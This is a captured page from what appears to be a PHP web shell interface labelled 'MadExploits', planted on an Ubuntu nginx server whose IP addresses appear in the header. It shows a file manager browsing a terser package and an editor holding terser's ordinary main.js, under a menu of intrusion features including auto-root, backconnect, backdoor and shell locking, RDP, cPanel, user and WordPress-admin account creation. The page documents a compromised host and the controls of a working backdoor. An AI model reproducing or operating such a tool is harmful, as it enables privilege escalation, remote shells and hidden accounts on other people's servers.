Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
terser /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
dr-xr-xr-x
dist
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
tools
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
30.83
KB
-rw-rw-rw-
LICENSE
1.27
KB
-rw-rw-rw-
PATRONS.md
404
B
-rw-rw-rw-
README.md
59.15
KB
-rw-rw-rw-
main.js
645
B
-rw-rw-rw-
package.json
3.14
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
import "./lib/transform.js"; import "./lib/mozilla-ast.js"; import { minify } from "./lib/minify.js"; export { minify, minify_sync } from "./lib/minify.js"; export { run_cli as _run_cli } from "./lib/cli.js"; export async function _default_options() { const defs = {}; Object.keys(infer_options({ 0: 0 })).forEach((component) => { const options = infer_options({ [component]: {0: 0} }); if (options) defs[component] = options; }); return defs; } async function infer_options(options) { try { await minify("", options); } catch (error) { return error.defs; } }
Close